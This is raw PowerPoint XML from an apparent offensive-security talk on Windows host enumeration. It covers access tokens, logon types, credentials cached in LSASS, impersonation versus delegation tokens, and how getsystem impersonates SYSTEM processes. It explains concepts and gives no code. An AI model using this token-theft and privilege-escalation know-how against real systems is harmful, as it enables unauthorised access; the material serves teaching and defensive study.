            <a:ext cx="8915254" cy="3829051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF081F1-3466-4DFB-A045-FC8A0D2029D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276746" y="3919610"/>
            <a:ext cx="2859634" cy="2736166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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78818427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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273613" y="6350020"/>
            <a:ext cx="7858125" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>^^^</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Not even the tokens we are talking about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E45121-A2EC-4BB0-BF42-38D5EE7F5C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060262" y="1414200"/>
            <a:ext cx="8060500" cy="4996780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361674854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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784902" y="1549609"/>
            <a:ext cx="10578516" cy="5539978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Lock and Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lock is the ACL, the security context, or ‘info’, within a process token is a key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the key fits the lock we can access the resource (everything in AD has a ‘lock’ on it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Every ‘Object’ in AD has an associated ACL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-When a process attempts to access the resource it first must present its token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>When a new process is created, it has a security token associated with it containing information like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Is the process running in an elevated context (UAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-The privileges the process has (For example, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> running as a user with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SeDebugPrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> enabled on its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can debug a service running as local system)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Can the process access a specific resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arrow: Right 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA1A69C-829E-49DE-BDCE-FD5E083F317D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239150" y="1723293"/>
            <a:ext cx="478301" cy="3376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Arrow: Right 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02772C9E-DF23-40B2-AD3B-44CB30182A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239149" y="3338733"/>
            <a:ext cx="478301" cy="3376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Arrow: Right 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7062B946-6D5D-494A-9BFE-9BC1985A1A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239148" y="4644684"/>
            <a:ext cx="478301" cy="3376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5387840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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process Tokens</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715301" y="1531062"/>
            <a:ext cx="10578516" cy="5232202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Network logon (type 3): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No actual credentials are used to authenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A client is already authenticated to the network, the client presents the server holding a resource with a hash or ticket. No actual credentials are used to authenticate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-----When the user wants to access a resource, they request a ticket that will only provide access to the resource they need.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-----The user wont be able to authenticate to other resources from the access server (since the ticket they requested only grants them access to the resource, and the server doesn’t have credentials to use in requesting a ticket for another resource.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Non-network logon:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Interactive and Clear-text logons fall in this category</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The user doesn’t yet have a token/hash to present so they must use credentials to authenticate. Interactive and Clear-text logons fall in this category. The user provides credentials that are then used to request the security token for the user. The server will then cache those credentials in LSASS(as well as the hash and ticket). When the user wants to request a resource the host can retrieve a ticket, using the cached credentials, that will grant them access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Arrow: Right 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975A9556-1408-4EBD-B519-9B1B06DBED95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175846" y="1969478"/>
            <a:ext cx="478301" cy="3376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Arrow: Right 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B2E85A-701B-435F-B21D-20FBE341159C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175846" y="4550899"/>
            <a:ext cx="478301" cy="3376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6069375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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation vs Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583567" y="1566480"/>
            <a:ext cx="9404723" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When looking at tokens in incognito you will see two categories, delegation and impersonation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impersonation tokens are for local use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Delegation tokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>have credentials associated with them and can be used to request tickets to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access network resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token impersonation levels only apply to Impersonation Tokens. Impersonation Tokens are created when a thread impersonates another user. Primary Tokens are the token type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>assoctiated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with a process and have no impersonation levels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An administrator can turn a token, including impersonation tokens, into a primary token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337049918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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Process Tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726179" y="1620134"/>
            <a:ext cx="10578516" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the ways </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonate a process that’s running as SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threads in a process default to use the process’s security token, BUT they can also use other security tokens via impersonation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Want to appear to be a certain user, use their security token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common utility in a network. A user can authenticate to a service and that service can run things on behalf of the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304336968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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
